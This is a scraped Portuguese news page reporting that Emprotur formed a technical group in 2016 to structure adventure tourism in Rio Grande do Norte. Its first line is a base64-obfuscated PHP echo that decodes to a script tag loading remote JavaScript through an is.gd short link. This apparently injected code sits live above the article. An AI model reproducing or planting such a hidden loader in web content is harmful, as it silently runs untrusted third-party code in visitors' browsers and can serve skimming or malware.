$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Emprotur monta grupo técnico para discutir Turismo de Aventura no RN

Emprotur monta grupo técnico para discutir Turismo de Aventura no RN
24 Mar 2016

O Rio Grande do Norte é abençoado não só pelo binômio Sol e Mar ou pela riqueza cultural e receptividade de seu povo, mas é também dotado de alguns dos maiores points mundiais para o turismo de aventura. No entanto, essa modalidade turística é historicamente pouco explorada no Estado.

Na sede da Empresa Potiguar de Promoção Turística do RN (Emprotur) ocorreu a primeira reunião do grupo técnico montado para discutir um novo panorama para o Turismo de Aventura no RN. A ideia é montar roteiros e estruturar esses destinos para receber bem o turista.

“Isso faz parte da nossa política de interiorização do Estado, destacada desde o início da gestão, apostando em novos destinos e fortalecendo mais ainda o turismo do nosso RN”, destacou o secretário estadual de Turismo, Ruy Gaspar.

São Miguel do Gostoso é dos locais mais procurados do mundo para a prática do kite surf? A Serra do Lima em Patu é point mundial para o voo livre na modalidade de parapente? Sim, mas nem sempre bastam a geografia ou a benção divina para consolidar um destino turístico. É preciso também estrutura, sobretudo quando o turismo é de aventura.

“Por isso iniciaremos esse trabalho com diagnóstico de carências do roteiro já montado pelo Sebrae/RN composto pelo Monte das Gameleiras, Serra de São Bento e Passa e Fica. Depois apresentaremos aos empreendedores da região e poder público para que dotem esses destinos da logística necessária para que possamos divulgar e incluir no pacote de operadoras e receptivos”, frisou a presidente da Emprotur, Aninha Costa.

Outros temas também foram discutidos, como a necessidade de estreitar laços com a Associação Brasileira das Empresas de Ecoturismo e Turismo de Aventura (Abeta). O intuito seria estabelecer mais profissionalismo, com normas e padrões para o Turismo de Aventura praticado em terras potiguares.

Para o gestor do projeto setorial de Turismo do Sebrae/RN, Yves Guerra, o turismo de aventura pressupõe zonas de risco e, para tal, exige protocolos de segurança e logística para assistência adequada de urgência e emergência,  além de capacitação de guias. Ele ressalta que o Sebrae/RN promoverá, entre os dias 25 e 27 de abril, o curso Gestão de Riscos no Turismo de Aventura (informações e inscrições: 0800 570 0800).

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *